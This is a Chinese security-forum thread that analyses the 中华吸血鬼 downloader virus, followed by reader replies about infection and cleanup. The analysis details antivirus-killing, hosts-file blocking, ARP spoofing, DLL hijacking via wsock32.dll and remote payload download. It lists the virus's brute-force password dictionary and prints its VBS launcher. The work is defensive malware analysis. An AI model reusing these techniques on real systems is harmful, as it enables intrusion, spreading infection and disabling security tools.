瑞星卡卡安全论坛

这是一个具有多种传播功能和反杀毒软件功能的下载者病毒，传播方式新颖独特，需要严密防范！
下面是该病毒的详细分析报告：

病毒初始化过程：
1.创建一个互斥量：中华吸血鬼2.2

2.删除SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}

3.释放如下副本或文件：
%systemroot%\Tasks\绿化.bat
%systemroot%\Tasks\csrss.exe
%systemroot%\Tasks\wsock32.dll

4.之后创建很多线程，执行多种病毒功能：
(1)通过GetWindowTextA函数获得窗口标题，并比较是否含有如下字样
worm
卡巴斯基
江民
金山
Anti
anti
Virus
virus
Firewall
Mcafee
查杀
主动防御
x
系统保护
主 动
主动
杀马
木马
上报
举 报
举报
进 程
进程
系统安全
Process
NOD32
专  杀
专 杀
专杀
安全卫士
绿鹰
...
如果含有则使用PostMessage函数会发送消息给他们：
首先发送一个WM_Destroy，之后发送两个WM_Close 最后发一个WM_Destroy 的消息。并把窗口标题名保存下来。
之后会调用Messageboxa函数弹出一个标题为"Windows盗版验证为"的窗口 并显示如下字样“安全提示：您正在使用的(刚刚获得的窗口标题名称)是盗版软件，可能您是盗版软件的受害者，为了给合法用户提供保证，我们无法继续给您提供服务，请到指定销售商购买我们的正版软件,如果有任何疑问,请到我们微软主页查看http://www.microsoft.com”



(2) 破坏冰刃
查找类名为Afxcontrolbar423s的窗口
然后发送WM_Close关闭 再模拟键盘输入按一下回车键

(3) U盘传播功能
检测可移动存储中是否有autorun.inf文件，如果有将其改名
之后向里面写入autorun.inf
创建recycle.{645FF040-5081-101B-9F08-00AA002F954E}文件夹，在该文件夹内写入GHOSTBAK.exe（病毒文件）

(4) 病毒感染统计
搜集被感染主机的mac地址，并把被感染主机的mac地址和感染的病毒版本发送给http://www.*******.cn/tj/ct.asp页面

(5) 修改hosts文件
获得%programfiles%的环境变量，接着查找[url=file://\\drivers\etc\\hosts]\\drivers\etc\\hosts[/url]文件
写入如下数据：
127.0.0.0 360.qihoo.com
127.0.0.1 qihoo.com
127.0.0.1 www.qihoo.com
127.0.0.1 www.qihoo.cn
127.0.0.1 124.40.51.17
127.0.0.1 58.17.236.92
127.0.0.1 www.kaspersky.com
127.0.0.1 60.210.176.251
127.0.0.1 www.cnnod32.cn
127.0.0.1 www.lanniao.org
127.0.0.1 www.nod32club.com
127.0.0.1 www.dswlab.com
127.0.0.1 bbs.sucop.com
127.0.0.1 www.virustotal.com
127.0.0.1 tool.ikaka.com
127.0.0.1 www.jiangmin.com
127.0.0.1 www.duba.net
127.0.0.1 www.eset.com.cn
127.0.0.1 www.nod32.com
127.0.0.1 shadu.duba.net
127.0.0.1 union.kingsoft.com
127.0.0.1 www.kaspersky.com.cn
127.0.0.1 kaspersky.com.cn
127.0.0.1 virustotal.com
127.0.0.1 www.360.cn
127.0.0.1 www.360safe.cn
127.0.0.1 www.360safe.com
127.0.0.1 www.chinakv.com
127.0.0.1 www.rising.com.cn
127.0.0.1 rising.com.cn
127.0.0.1 dl.jiangmin.com
127.0.0.1 jiangmin.com
每1秒循环一次

(6) 遍历进程，调用Terminate Process函数结束如下进程：
AST.exe
360tray.exe
ast.exe
FWMon.exe

(7) 遍历磁盘文件删除扩展名为gho,GHO,Gho的文件

(8) arp欺骗功能
获取本机IP地址 然后把所在同网段内的.2~.255的机器作为欺骗对象
由系统目录下的arps.com执行%s  -idx 0 -ip %s -port 80 -insert \"%s的命令 对局域网内机器进行arp欺骗

(9) 局域网弱密码猜解传播
以administrator为用户名，对局域网中其他机器进行密码猜解。如果成功则复制到对方机器的共享的C,D,E,F盘中，以hackshen.exe
病毒猜解的密码字典如下：
woaini
baby
asdf
NULL
angel
asdfgh
1314520
5201314
caonima
88888
bbbbbb
12345678
memory
abc123
qwerty
123456
password
enter
hack
xpuser
money
yeah
time
game
user
home
alex
guest
admin
test
administrator
movie
root
love

(10)删除HKLM\SOFTWARE\Microsoft\Windows Script Host\Settings键
释放一个hackchen.vbs到%systemroot%\Tasks
hackchen.vbs内容：
On Error Resume Next
Set rs=createObject("Wscript.shell")
rs.run "%windir%\Tasks\csrss.exe",0
并且注册HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}  指向%systemroot%\Tasks\hackchen.vbs

(11) 病毒自动更新功能。在系统目录下释放meupdate.ini文件，并且和http://www.*******.cn/22.txt做比较，如果不同则下载http://www.*******.cn/server.exe（最新版病毒程序）到c:\_default.pif，并且每600ms执行一次

(12)通过查找%ProgramFiles%的环境变量获得程序文件夹路径，之后查找[url=file://\\WinRAR\\Rar.exe]\\WinRAR\\Rar.exe[/url]获得winrar安装路径。
遍历所有分区的.rar,.zip,.tgz,.cab,.tar文件 找到后
后台调用winrar执行"（winrar路径）" -ep a "（找到的rar等文件路径）" %systemroot%\Tasks\绿化.bat 命令
将绿化.bat压缩进压缩包，绿化.bat即为病毒本身，诱使用户点击中毒。

(13)（此方法十分新颖）
遍历所有文件夹并且将%systemroot%\Tasks\wsock32.dll 复制到每个文件夹下
当该文件夹下的exe文件的导入表含有wsock32.dll的时候，会首先调用同文件夹下的wsock32.dll，也就是病毒释放的文件。此时会从下载http://www.*******.cn/server.exe（病毒最新版本）并执行！！！

(14) 查找某些类名为#32770的窗口，并且试图发送"我做了快一个月了,每天2个小时有40-50元的收入,你也来看看吧,长期大量招聘网络兼职http://www.*******.cn/jianzhi.htm"的消息给对方(应该是通过QQ之类的聊天工具传播)

(15) 遍历非系统分区的html,aspx，htm等文件 写入iframe代码

(16)下载木马功能
下载http://www.*******.cn/ft/qq.exe
http://www.*******.cn/cj/qq.exe
并执行

清除方法不作赘述，安全模式下清理所有文件夹下的wsock32.dll，
并利用工具清理%systemroot%\Tasks\绿化.bat
%systemroot%\Tasks\csrss.exe
并打开所有压缩包文件 删除里面的绿化.bat。
最后使用杀毒软件全盘杀毒
这也是一个浩大的工程吧~~

综观此病毒有很多新颖之处，首先是在关闭杀软之后弹出窗口，容易给不知情者以迷惑；其次病毒释放的wsock32.dll会使得任意该目录下的exe文件成为下载病毒文件的傀儡；再次由于windows的某些保护，tasks目录下的文件无法直接看到，这又给病毒了一个绝佳的藏身之地；最后，病毒还会将自己压缩到压缩包中，起一个诱惑的名字诱使用户再次中毒。
最近恶性病毒以及木马群肆虐，但此类行为特征新颖的病毒也有所猖獗，望大家做好防范！

用户系统信息：Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2)

在你博客里读到了，感谢分享

:default1: :default1:
要真是不小心中了，清除不还得累死？
我看还是全盘格了重做还好过点:default3: :default3:

好久没有拜读到阳光的大作了。:default6:

哇。我是不是中了这个啦，可怕极了：

我电脑的情况：玩传奇一会就掉线，打开互联网连接上，可实际是没联上/必须重启后才能正常连接

哪我的电脑是不是中了这个？？高手请教！！

释放一个hackchen.vbs到%systemroot%\Tasks
这个……

师傅你这么晚了还不睡觉:kaka16:

:default9:  碰到威力很强啊,昨天在一公司杀毒,他们那网络很脆弱,一台中其他电脑用不了多久就中了.......    起初不知道什么病毒来的. 早上清理完成下午就又来.  看阳光哥的文章才知道又是一"创新形病毒". 杀起来真有劲....

终于出现了个有点意思的病毒。
期待实战

:default2: 说了半天没说怎么防范啊~

/http://www.newjian.com/zuixinbingdu/2008/0619/3364.html版主应该不是转载的吧，嘿嘿！！！~不管怎么样，谢谢你的善意提醒~~~~

你搞什么哦？？

你那地方的，你没注意那里注着：作者：清新阳光

可能你不知道吧？？？

俺这位newcenturymoon版主就是  清新阳光 耶！！！！

是你说的那地方在转载他的东西耶！！！！

:default14:

你也坏

起个英文名

你要起名“清新阳光”，估计就没人误会了。:default7:

之前注册这个论坛的时候 我还什么都不懂

(13)（此方法十分新颖）

我晕，哪里新颖了，是很老的方法，只不过近年来已经比较少用了。

你总喜欢挤兑人。

意思是这一年下来，已少见了呗。

:default2:

你非较真不可。:default7:

:default6: 这一年来阳光就是在我的一次次“较真”和“挤兑”中成长的，给他挑错已经成了我的习惯。



具体地说是tasks文件夹中的desktop.ini指定了文件夹在资源管理器下显示的style。
这与Downloaded Program Files文件夹（以前流氓插件经常藏身于此）是同样的道理。

用WINRAR等就可以直接看到里面的内容，而不受desktop.ini的影响。

另外阳光应该把病毒样本发到样本区:default6:

还绝的是

他发哪论坛

你就跑到哪论坛

追着较:default7:

顶一个。最好说说咋清除简单

哈哈
这病毒的作者很狂的 说要饿死杀毒软件厂商（大概是杀毒软件检测不到该病毒吧）
我上报过一个测试版的中华吸血鬼，但其收费版的我搞不到，所以也无法上报。这个吸血鬼我看过，功能倒是挺多的，还号称拥有最完美的U盘染毒方法。不知道是真的还是假的...
瑞星得加强查杀力度，捉住这只吸血鬼！:default6:

没有新意的病毒...

各位大虾，我的电脑中毒了。有厉害的请教……

那偶就顺手牵羊了~:default6:

学习了...

为什么我格盘了之后还是会有

我已经中了
怎么办 ？

今天有空，看了一下这个吸血鬼。
网上吵得比较凶。甚至有人说它是什么“第五代机器狗”。
下载样本运行了一下-------暴汗！还不够给机器狗当跟包的呢。

附件: 1.jpg

附件: 2.jpg

猫这么说，弄这毒的那家伙不得气死:default6:

用代理服务器。这样病毒就认为代理服务器的IP地址就是你的IP地址，病毒就无法攻击了。

分析的很详细  但“安全模式下清理所有文件夹下的wsock32.dll”
这个 好象有点毛病 C:\WINDOWS\system32  也有wsock32.dll 正常文件